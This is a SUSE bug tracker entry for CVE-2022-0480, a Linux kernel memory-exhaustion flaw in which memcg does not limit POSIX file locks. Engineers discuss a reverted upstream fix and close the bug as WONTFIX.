Bug 1195487 (CVE-2022-0480)

Summary: VUL-0: CVE-2022-0480: kernel-source-azure,kernel-source,kernel-source-rt: memcg does not limit the number of POSIX file locks allowing memory exhaustion
Product: [Novell Products] SUSE Security Incidents Reporter: Carlos López <carlos.lopez>
Component: IncidentsAssignee: Security Team bot <security-team>
Status: RESOLVED WONTFIX QA Contact: Security Team bot <security-team>
Severity: Normal    
Priority: P3 - Medium CC: meissner, mhocko, mkoutny, smash_bz, tiwai, vbabka
Version: unspecified   
Target Milestone: ---   
Hardware: Other   
OS: Other   
URL: https://smash.suse.de/issue/322419/
See Also: https://bugzilla.suse.com/show_bug.cgi?id=1190115
https://bugzilla.kernel.org/show_bug.cgi?id=216038
Whiteboard: CVSSv3.1:SUSE:CVE-2022-0480:6.2:(AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Found By: Security Response Team Services Priority:
Business Priority: Blocker: ---
Marketing QA Status: --- IT Deployment: ---

Description Carlos López 2022-02-03 09:50:12 UTC 
rh#2049700

A flaw was found in the Linux kernel. A host memory exhaustion is possible because memcg does not limit the number of POSIX file locks.

References:
https://github.com/kata-containers/kata-containers/issues/3373
https://bugzilla.redhat.com/show_bug.cgi?id=2049700
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0480
Comment 1 Carlos López 2022-02-03 09:51:22 UTC 
There is no real fix for this issue. The supposed fix [0] was reverted due to a performance regression [1], and as far as I can tell, this was never addressed again.

cve/linux-4.4 and older branches do not contain the intended fix, and newer branches contain the revert, so no branches are left in the intermediate state.

[0] https://github.com/torvalds/linux/commit/0f12156dff2862ac54235fc72703f18770769042
[1] https://github.com/torvalds/linux/commit/3754707bcc3e190e5dadc978d172b61e809cb3bd
Comment 3 Michal Koutný 2022-02-03 10:50:30 UTC 
Carlos, we've gone through the all patch-revert dance in SLES kernels, ending up with the reverts. For this particular case, see also bug 1190115, comment 6.

Let me check if there's anything new [1] that could justify this change against performance impact.

[1] BTW the Launchad link [2] refernced from GH gives me kind of 404.
[2] https://bugs.launchpad.net/katacontainers.io/+bug/1956283
Comment 7 Michal Koutný 2022-05-23 16:17:58 UTC 
There's been no response to my reminder upstream.

In theory, this CVE bug could be rejected as invalid since there's no solution
in the upstream. Besides that I can see three options how to move the
underlying issue forward:
  1) attack security aspect,
  2) attack performance regression,
  3) find efficient solution.

The 1) and 2) are pushing against each other (and 2) against Linus too) so
that's bit of a stalemate.
No. 3) requires more involved analysis of the performance regression, that's my
direction now.

(In reply to Michal Koutný from comment #5)
> I'll post an update by two weeks.
That didn't work out well last time. Bumping my internal priority.
Comment 8 Michal Koutný 2022-05-27 17:24:01 UTC 
This bug has status of part security and part performance problem. The upstream prioritizes the performance conservation so there's no solution to the CVE currently.
I propose resolving this as wontifx from our PoV, i.e. I reassign the bug back to sec team _without_ submitting anything to our kernels.

FTR, I've filed an upstream BZ [1] entry to track the problem there.

[1] https://bugzilla.kernel.org/show_bug.cgi?id=216038
Comment 9 Carlos López 2022-05-30 15:49:36 UTC 
Closing as WONTFIX then. Feel free to reopen if there are any further developments upstream.